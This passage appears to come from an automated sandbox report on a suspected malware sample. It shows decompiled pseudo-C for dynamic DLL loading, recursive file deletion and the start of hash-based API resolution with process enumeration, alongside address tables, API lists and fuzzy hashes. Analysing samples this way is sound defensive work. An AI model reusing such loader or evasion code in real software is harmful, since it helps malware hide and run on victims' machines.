                                                                                                                          												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__eflags = _v52 - _t282;
                                                                                                                          								if(_v52 != _t282) {
                                                                                                                          									L178:
                                                                                                                          									_t324[lstrlenA(_t324)] = 0x41;
                                                                                                                          									_t228 = E704815C2( *(_t329 + 0x808), _t324);
                                                                                                                          									__eflags = _t228 - _t282;
                                                                                                                          									if(_t228 != _t282) {
                                                                                                                          										L166:
                                                                                                                          										 *(_t329 + 0x80c) = _t228;
                                                                                                                          										goto L182;
                                                                                                                          									}
                                                                                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                                                          									L180:
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										goto L182;
                                                                                                                          									}
                                                                                                                          									L181:
                                                                                                                          									_t205 = _t329 + 4;
                                                                                                                          									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                                                                                          									__eflags =  *_t205;
                                                                                                                          									goto L182;
                                                                                                                          								} else {
                                                                                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                                                          									if( *(_t329 + 0x80c) != _t282) {
                                                                                                                          										goto L182;
                                                                                                                          									}
                                                                                                                          									goto L178;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t233 = LoadLibraryA(_t323); // executed
                                                                                                                          							__eflags = _t233 - _t282;
                                                                                                                          							 *(_t329 + 0x808) = _t233;
                                                                                                                          							if(_t233 == _t282) {
                                                                                                                          								goto L181;
                                                                                                                          							}
                                                                                                                          							goto L171;
                                                                                                                          						}
                                                                                                                          						_t188 = _t329 + 0x408; // 0x408
                                                                                                                          						_t235 = E704812FE(_t188);
                                                                                                                          						 *(_t329 + 0x80c) = _t235;
                                                                                                                          						__eflags = _t235 - _t282;
                                                                                                                          						goto L180;
                                                                                                                          					}
                                                                                                                          					_t236 = _t224 - 1;
                                                                                                                          					if(_t236 == 0) {
                                                                                                                          						_t185 = _t329 + 0x408; // 0x408
                                                                                                                          						_t237 = _t185;
                                                                                                                          						__eflags =  *_t237;
                                                                                                                          						if( *_t237 == 0) {
                                                                                                                          							goto L182;
                                                                                                                          						}
                                                                                                                          						_t228 = E704812FE(_t237);
                                                                                                                          						L165:
                                                                                                                          						goto L166;
                                                                                                                          					}
                                                                                                                          					if(_t236 != 1) {
                                                                                                                          						goto L182;
                                                                                                                          					}
                                                                                                                          					_t81 = _t329 + 8; // 0x8
                                                                                                                          					_t283 = _t81;
                                                                                                                          					_t325 = E704812FE(_t81);
                                                                                                                          					 *(_t329 + 0x808) = _t325;
                                                                                                                          					if(_t325 == 0) {
                                                                                                                          						goto L181;
                                                                                                                          					}
                                                                                                                          					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                                                                                          					 *((intOrPtr*)(_t329 + 0x850)) = E70481224(_t283);
                                                                                                                          					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                                                                                          					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                                                                                          					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                                                                                          					_t90 = _t329 + 0x408; // 0x408
                                                                                                                          					_t228 =  *(_t325->i + E704812FE(_t90) * 4);
                                                                                                                          					goto L165;
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x70481c5a
                                                                                                                          0x70481c60
                                                                                                                          0x70481c62
                                                                                                                          0x70481c76
                                                                                                                          0x70481c76
                                                                                                                          0x70481c78
                                                                                                                          0x70481c64
                                                                                                                          0x70481c6a
                                                                                                                          0x70481c6d
                                                                                                                          0x70481c6d
                                                                                                                          0x00000000
                                                                                                                          0x70481bff
                                                                                                                          0x70481bff
                                                                                                                          0x70481bff
                                                                                                                          0x70481c00
                                                                                                                          0x70481c08
                                                                                                                          0x70481c0c
                                                                                                                          0x70481c12
                                                                                                                          0x70481c16
                                                                                                                          0x00000000
                                                                                                                          0x70481c16
                                                                                                                          0x70481c02
                                                                                                                          0x70481c02
                                                                                                                          0x70481c03
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481c05
                                                                                                                          0x70481c06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481c06
                                                                                                                          0x70481b96
                                                                                                                          0x70481b97
                                                                                                                          0x70481ba0
                                                                                                                          0x70481ba3
                                                                                                                          0x70481bb0
                                                                                                                          0x70481bb0
                                                                                                                          0x70481ba5
                                                                                                                          0x70481ba5
                                                                                                                          0x70481c7e
                                                                                                                          0x70481c81
                                                                                                                          0x70481c84
                                                                                                                          0x70481cf6
                                                                                                                          0x70481cfa
                                                                                                                          0x70481adc
                                                                                                                          0x00000000
                                                                                                                          0x70481adc
                                                                                                                          0x00000000
                                                                                                                          0x70481cfa
                                                                                                                          0x70481b94
                                                                                                                          0x70481b00
                                                                                                                          0x70481b03
                                                                                                                          0x70481b66
                                                                                                                          0x70481b69
                                                                                                                          0x70481b7a
                                                                                                                          0x70481b7a
                                                                                                                          0x70481b7d
                                                                                                                          0x70481c89
                                                                                                                          0x70481c8c
                                                                                                                          0x70481c8c
                                                                                                                          0x70481c8e
                                                                                                                          0x70482033
                                                                                                                          0x70482045
                                                                                                                          0x70482045
                                                                                                                          0x70482047
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482037
                                                                                                                          0x70482038
                                                                                                                          0x7048203b
                                                                                                                          0x7048203e
                                                                                                                          0x704820ba
                                                                                                                          0x704820c1
                                                                                                                          0x704820c6
                                                                                                                          0x704820c9
                                                                                                                          0x70481cf2
                                                                                                                          0x70481cf2
                                                                                                                          0x70481cf2
                                                                                                                          0x70481cf3
                                                                                                                          0x00000000
                                                                                                                          0x70481cf3
                                                                                                                          0x70482040
                                                                                                                          0x70482042
                                                                                                                          0x70482042
                                                                                                                          0x70482049
                                                                                                                          0x7048204b
                                                                                                                          0x704820ae
                                                                                                                          0x70481ce7
                                                                                                                          0x70481cea
                                                                                                                          0x70481ced
                                                                                                                          0x70481cf0
                                                                                                                          0x70481cf0
                                                                                                                          0x00000000
                                                                                                                          0x70481cf0
                                                                                                                          0x7048204d
                                                                                                                          0x7048204f
                                                                                                                          0x70482055
                                                                                                                          0x70482055
                                                                                                                          0x70482057
                                                                                                                          0x7048205a
                                                                                                                          0x7048206d
                                                                                                                          0x7048206d
                                                                                                                          0x70482070
                                                                                                                          0x70482073
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482075
                                                                                                                          0x70482078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x7048207a
                                                                                                                          0x70482081
                                                                                                                          0x70482081
                                                                                                                          0x70482087
                                                                                                                          0x7048208a
                                                                                                                          0x704820a6
                                                                                                                          0x7048208c
                                                                                                                          0x70482095
                                                                                                                          0x70482098
                                                                                                                          0x70482098
                                                                                                                          0x00000000
                                                                                                                          0x7048208a
                                                                                                                          0x7048205c
                                                                                                                          0x7048205f
                                                                                                                          0x70482062
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482064
                                                                                                                          0x00000000
                                                                                                                          0x70482064
                                                                                                                          0x70482051
                                                                                                                          0x70482053
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482053
                                                                                                                          0x70481c94
                                                                                                                          0x70481c94
                                                                                                                          0x70481c95
                                                                                                                          0x70481dde
                                                                                                                          0x70481dde
                                                                                                                          0x70481de5
                                                                                                                          0x70481de8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481df5
                                                                                                                          0x00000000
                                                                                                                          0x70481fdb
                                                                                                                          0x70481fde
                                                                                                                          0x70481fe1
                                                                                                                          0x70481fe1
                                                                                                                          0x70481fe2
                                                                                                                          0x70481fe5
                                                                                                                          0x70481fe7
                                                                                                                          0x70481fe9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481feb
                                                                                                                          0x70481feb
                                                                                                                          0x70481fee
                                                                                                                          0x70482000
                                                                                                                          0x70482003
                                                                                                                          0x70482006
                                                                                                                          0x7048200c
                                                                                                                          0x00000000
                                                                                                                          0x7048200c
                                                                                                                          0x70481ff0
                                                                                                                          0x70481ff0
                                                                                                                          0x70481ff2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481ff4
                                                                                                                          0x70481ff6
                                                                                                                          0x70481ff8
                                                                                                                          0x70481ff8
                                                                                                                          0x70481ff8
                                                                                                                          0x70481ff9
                                                                                                                          0x70481ffb
                                                                                                                          0x70481ffd
                                                                                                                          0x70481fe1
                                                                                                                          0x70481fe2
                                                                                                                          0x70481fe5
                                                                                                                          0x70481fe7
                                                                                                                          0x70481fe9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481fe9
                                                                                                                          0x00000000
                                                                                                                          0x70481e3c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481e48
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481e2f
                                                                                                                          0x70481e33
                                                                                                                          0x70481e37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481fad
                                                                                                                          0x70481fb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481fb7
                                                                                                                          0x70481fbf
                                                                                                                          0x70481fc6
                                                                                                                          0x70481fce
                                                                                                                          0x70481cb8
                                                                                                                          0x70481cb8
                                                                                                                          0x70481cbb
                                                                                                                          0x70481ce4
                                                                                                                          0x00000000
                                                                                                                          0x70481ce4
                                                                                                                          0x70481cbd
                                                                                                                          0x70481cbd
                                                                                                                          0x70481cc0
                                                                                                                          0x70481cda
                                                                                                                          0x00000000
                                                                                                                          0x70481cda
                                                                                                                          0x70481cc2
                                                                                                                          0x70481cc2
                                                                                                                          0x70481cc5
                                                                                                                          0x70481cd4
                                                                                                                          0x00000000
                                                                                                                          0x70481cd4
                                                                                                                          0x70481cc8
                                                                                                                          0x70481cc9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481ccb
                                                                                                                          0x00000000
                                                                                                                          0x70481b83
                                                                                                                          0x70481b83
                                                                                                                          0x70481b86
                                                                                                                          0x00000000
                                                                                                                          0x70481b86
                                                                                                                          0x70481b7d
                                                                                                                          0x70481b6b
                                                                                                                          0x70481b6f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481b71
                                                                                                                          0x70481b74
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481b74
                                                                                                                          0x70481b05
                                                                                                                          0x70481b08
                                                                                                                          0x70481b3e
                                                                                                                          0x70481b41
                                                                                                                          0x00000000
                                                                                                                          0x70481b47
                                                                                                                          0x70481b49
                                                                                                                          0x70481b4d
                                                                                                                          0x70481b54
                                                                                                                          0x70481b5b
                                                                                                                          0x70481b5e
                                                                                                                          0x70481b61
                                                                                                                          0x00000000
                                                                                                                          0x70481b61
                                                                                                                          0x70481b41
                                                                                                                          0x70481b0a
                                                                                                                          0x70481b0b
                                                                                                                          0x70481b26
                                                                                                                          0x70481b29
                                                                                                                          0x00000000
                                                                                                                          0x70481b2f
                                                                                                                          0x70481b2f
                                                                                                                          0x70481b36
                                                                                                                          0x70481b39
                                                                                                                          0x00000000
                                                                                                                          0x70481b39
                                                                                                                          0x70481b29
                                                                                                                          0x70481b10
                                                                                                                          0x00000000
                                                                                                                          0x70481b16
                                                                                                                          0x70481b16
                                                                                                                          0x70481b1d
                                                                                                                          0x00000000
                                                                                                                          0x70481b1d
                                                                                                                          0x70481b10
                                                                                                                          0x70481d09
                                                                                                                          0x70481d0e
                                                                                                                          0x70481d13
                                                                                                                          0x70481d17
                                                                                                                          0x704821c6
                                                                                                                          0x704821cc
                                                                                                                          0x70481d29
                                                                                                                          0x70481d2b
                                                                                                                          0x70481d2c
                                                                                                                          0x704820f1
                                                                                                                          0x704820f1
                                                                                                                          0x704820f4
                                                                                                                          0x704820f7
                                                                                                                          0x70482114
                                                                                                                          0x7048211a
                                                                                                                          0x7048211c
                                                                                                                          0x70482122
                                                                                                                          0x70482139
                                                                                                                          0x70482139
                                                                                                                          0x70482139
                                                                                                                          0x70482146
                                                                                                                          0x7048214c
                                                                                                                          0x7048214f
                                                                                                                          0x70482155
                                                                                                                          0x70482157
                                                                                                                          0x7048215a
                                                                                                                          0x7048215c
                                                                                                                          0x70482163
                                                                                                                          0x70482168
                                                                                                                          0x7048216b
                                                                                                                          0x7048216d
                                                                                                                          0x70482172
                                                                                                                          0x70482184
                                                                                                                          0x70482184
                                                                                                                          0x70482172
                                                                                                                          0x7048216b
                                                                                                                          0x7048215a
                                                                                                                          0x7048218a
                                                                                                                          0x7048218d
                                                                                                                          0x70482197
                                                                                                                          0x7048219f
                                                                                                                          0x704821ab
                                                                                                                          0x704821b1
                                                                                                                          0x704821b4
                                                                                                                          0x704820e6
                                                                                                                          0x704820e6
                                                                                                                          0x00000000
                                                                                                                          0x704820e6
                                                                                                                          0x704821ba
                                                                                                                          0x704821c0
                                                                                                                          0x704821c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x704821c2
                                                                                                                          0x704821c2
                                                                                                                          0x704821c2
                                                                                                                          0x704821c2
                                                                                                                          0x00000000
                                                                                                                          0x7048218f
                                                                                                                          0x7048218f
                                                                                                                          0x70482195
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482195
                                                                                                                          0x7048218d
                                                                                                                          0x70482125
                                                                                                                          0x7048212b
                                                                                                                          0x7048212d
                                                                                                                          0x70482133
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70482133
                                                                                                                          0x704820f9
                                                                                                                          0x70482100
                                                                                                                          0x70482106
                                                                                                                          0x7048210c
                                                                                                                          0x00000000
                                                                                                                          0x7048210c
                                                                                                                          0x70481d32
                                                                                                                          0x70481d33
                                                                                                                          0x704820d0
                                                                                                                          0x704820d0
                                                                                                                          0x704820d6
                                                                                                                          0x704820d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x704820e0
                                                                                                                          0x704820e5
                                                                                                                          0x00000000
                                                                                                                          0x704820e5
                                                                                                                          0x70481d3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481d40
                                                                                                                          0x70481d40
                                                                                                                          0x70481d49
                                                                                                                          0x70481d4e
                                                                                                                          0x70481d54
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x70481d5a
                                                                                                                          0x70481d67
                                                                                                                          0x70481d6d
                                                                                                                          0x70481d77
                                                                                                                          0x70481d7d
                                                                                                                          0x70481d85
                                                                                                                          0x70481d95
                                                                                                                          0x00000000
                                                                                                                          0x70481d95

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 70481215: GlobalAlloc.KERNEL32(00000040,70481233,?,704812CF,-7048404B,704811AB,-000000A0), ref: 7048121D
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70481BC4
                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 70481C0C
                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 70481C16
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481C29
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481D09
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481D0E
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481D13
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481EFA
                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 70482098
                                                                                                                          • GetModuleHandleA.KERNELBASE(00000008), ref: 70482114
                                                                                                                          • LoadLibraryA.KERNELBASE(00000008), ref: 70482125
                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 7048217E
                                                                                                                          • lstrlenA.KERNEL32(00000408), ref: 70482198
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 245916457-0
                                                                                                                          • Opcode ID: d74b2cc3509f4a7b711d7bec4f92bae95c28640d33c84deccd988725135467de
                                                                                                                          • Instruction ID: c0c4960d9df168e15ee149ff7f1e028bf70ed7ca063302a8f4088f3ddcbb9b16
                                                                                                                          • Opcode Fuzzy Hash: d74b2cc3509f4a7b711d7bec4f92bae95c28640d33c84deccd988725135467de
                                                                                                                          • Instruction Fuzzy Hash: 61229B71D04249DFCB128FA4C9847ADBBF9BB05305F204D2FD696A23E0D7786A82DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				struct _WIN32_FIND_DATAA _v336;
                                                                                                                          				signed int _t40;
                                                                                                                          				char* _t53;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t58;
                                                                                                                          				signed int _t64;
                                                                                                                          				signed int _t66;
                                                                                                                          				void* _t68;
                                                                                                                          				signed char _t69;
                                                                                                                          				CHAR* _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				CHAR* _t73;
                                                                                                                          				char* _t76;
                                                                                                                          
                                                                                                                          				_t69 = _a8;
                                                                                                                          				_t73 = _a4;
                                                                                                                          				_v8 = _t69 & 0x00000004;
                                                                                                                          				_t40 = E00405CD3(__eflags, _t73);
                                                                                                                          				_v16 = _t40;
                                                                                                                          				if((_t69 & 0x00000008) != 0) {
                                                                                                                          					_t66 = DeleteFileA(_t73); // executed
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t68 =  ~_t66 + 1;
                                                                                                                          					 *0x42f4e8 =  *0x42f4e8 + _t68;
                                                                                                                          					return _t68;
                                                                                                                          				}
                                                                                                                          				_a4 = _t69;
                                                                                                                          				_t8 =  &_a4;
                                                                                                                          				 *_t8 = _a4 & 0x00000001;
                                                                                                                          				__eflags =  *_t8;
                                                                                                                          				if( *_t8 == 0) {
                                                                                                                          					L5:
                                                                                                                          					E0040624D(0x42b8c0, _t73);
                                                                                                                          					__eflags = _a4;
                                                                                                                          					if(_a4 == 0) {
                                                                                                                          						E00405C2C(_t73);
                                                                                                                          					} else {
                                                                                                                          						lstrcatA(0x42b8c0, "\*.*");
                                                                                                                          					}
                                                                                                                          					__eflags =  *_t73;
                                                                                                                          					if( *_t73 != 0) {
                                                                                                                          						L10:
                                                                                                                          						lstrcatA(_t73, 0x40a014);
                                                                                                                          						L11:
                                                                                                                          						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                                                          						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
                                                                                                                          						__eflags = _t40 - 0xffffffff;
                                                                                                                          						_v12 = _t40;
                                                                                                                          						if(_t40 == 0xffffffff) {
                                                                                                                          							L29:
                                                                                                                          							__eflags = _a4;
                                                                                                                          							if(_a4 != 0) {
                                                                                                                          								_t32 = _t71 - 1;
                                                                                                                          								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                          								__eflags =  *_t32;
                                                                                                                          							}
                                                                                                                          							goto L31;
                                                                                                                          						} else {
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						do {
                                                                                                                          							L12:
                                                                                                                          							_t76 =  &(_v336.cFileName);
                                                                                                                          							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
                                                                                                                          							__eflags =  *_t53;
                                                                                                                          							if( *_t53 != 0) {
                                                                                                                          								__eflags = _v336.cAlternateFileName;
                                                                                                                          								if(_v336.cAlternateFileName != 0) {
                                                                                                                          									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t76 - 0x2e;
                                                                                                                          							if( *_t76 != 0x2e) {
                                                                                                                          								L19:
                                                                                                                          								E0040624D(_t71, _t76);
                                                                                                                          								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									_t55 = E004059CD(__eflags, _t73, _v8);
                                                                                                                          									__eflags = _t55;
                                                                                                                          									if(_t55 != 0) {
                                                                                                                          										E00405374(0xfffffff2, _t73);
                                                                                                                          									} else {
                                                                                                                          										__eflags = _v8 - _t55;
                                                                                                                          										if(_v8 == _t55) {
                                                                                                                          											 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                                                          										} else {
                                                                                                                          											E00405374(0xfffffff1, _t73);
                                                                                                                          											E0040602C(_t72, _t73, 0);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										E00405A15(__eflags, _t73, _a8);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                                          							__eflags = _t64;
                                                                                                                          							if(_t64 == 0) {
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							__eflags = _t64 - 0x2e;
                                                                                                                          							if(_t64 != 0x2e) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							__eflags =  *((char*)(_t76 + 2));
                                                                                                                          							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							goto L19;
                                                                                                                          							L27:
                                                                                                                          							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                                                          							__eflags = _t58;
                                                                                                                          						} while (_t58 != 0);
                                                                                                                          						_t40 = FindClose(_v12);
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					__eflags =  *0x42b8c0 - 0x5c;
                                                                                                                          					if( *0x42b8c0 != 0x5c) {
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t40;
                                                                                                                          					if(_t40 == 0) {
                                                                                                                          						L31:
                                                                                                                          						__eflags = _a4;
                                                                                                                          						if(_a4 == 0) {
                                                                                                                          							L39:
                                                                                                                          							return _t40;
                                                                                                                          						}
                                                                                                                          						__eflags = _v16;
                                                                                                                          						if(_v16 != 0) {
                                                                                                                          							_t40 = E004065C1(_t73);
                                                                                                                          							__eflags = _t40;
                                                                                                                          							if(_t40 == 0) {
                                                                                                                          								goto L39;
                                                                                                                          							}
                                                                                                                          							E00405BE5(_t73);
                                                                                                                          							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
                                                                                                                          							__eflags = _t40;
                                                                                                                          							if(_t40 != 0) {
                                                                                                                          								return E00405374(0xffffffe5, _t73);
                                                                                                                          							}
                                                                                                                          							__eflags = _v8;
                                                                                                                          							if(_v8 == 0) {
                                                                                                                          								goto L33;
                                                                                                                          							}
                                                                                                                          							E00405374(0xfffffff1, _t73);
                                                                                                                          							return E0040602C(_t72, _t73, 0);
                                                                                                                          						}
                                                                                                                          						L33:
                                                                                                                          						 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                                                          						return _t40;
                                                                                                                          					}
                                                                                                                          					__eflags = _t69 & 0x00000002;
                                                                                                                          					if((_t69 & 0x00000002) == 0) {
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          			}



















                                                                                                                          0x00405b3f
                                                                                                                          0x00405b42
                                                                                                                          0x00405b4a
                                                                                                                          0x00405b4a
                                                                                                                          0x00405b3d
                                                                                                                          0x00405b18
                                                                                                                          0x00405b1e
                                                                                                                          0x00405b20
                                                                                                                          0x00405b26
                                                                                                                          0x00405b26
                                                                                                                          0x00405b20
                                                                                                                          0x00000000
                                                                                                                          0x00405b16
                                                                                                                          0x00405af7
                                                                                                                          0x00405afa
                                                                                                                          0x00405afc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405afe
                                                                                                                          0x00405b00
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b02
                                                                                                                          0x00405b06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b61
                                                                                                                          0x00405b6b
                                                                                                                          0x00405b71
                                                                                                                          0x00405b71
                                                                                                                          0x00405b7c
                                                                                                                          0x00000000
                                                                                                                          0x00405b7c
                                                                                                                          0x00405a98
                                                                                                                          0x00405a9f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a5d
                                                                                                                          0x00405a5d
                                                                                                                          0x00405a5f
                                                                                                                          0x00405b8c
                                                                                                                          0x00405b8e
                                                                                                                          0x00405b91
                                                                                                                          0x00405be2
                                                                                                                          0x00405be2
                                                                                                                          0x00405be2
                                                                                                                          0x00405b93
                                                                                                                          0x00405b96
                                                                                                                          0x00405ba1
                                                                                                                          0x00405ba6
                                                                                                                          0x00405ba8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405bab
                                                                                                                          0x00405bb7
                                                                                                                          0x00405bbc
                                                                                                                          0x00405bbe
                                                                                                                          0x00000000
                                                                                                                          0x00405bd9
                                                                                                                          0x00405bc0
                                                                                                                          0x00405bc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405bc8
                                                                                                                          0x00000000
                                                                                                                          0x00405bcf
                                                                                                                          0x00405b98
                                                                                                                          0x00405b98
                                                                                                                          0x00000000
                                                                                                                          0x00405b98
                                                                                                                          0x00405a65
                                                                                                                          0x00405a68
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a68

                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNELBASE(?,?,74B5FA90,74B5F560,00000000), ref: 00405A3E
                                                                                                                          • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405A86
                                                                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AA7
                                                                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405AAD
                                                                                                                          • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,74B5FA90,74B5F560,00000000), ref: 00405ABE
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $\*.*
                                                                                                                          • API String ID: 2035342205-4271560472
                                                                                                                          • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                          • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                                                          • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                                                          • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E703C4243(void* __eflags, intOrPtr _a4) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char _v544;
                                                                                                                          				void* _v580;
                                                                                                                          				struct tagPROCESSENTRY32W* _t25;
                                                                                                                          
                                                                                                                          				_v8 = E703C45AA();
                                                                                                                          				_v16 = E703C4652(_v8, 0xea31d3b6);
                                                                                                                          				_v20 = E703C4652(_v8, 0x5c7bf6e9);
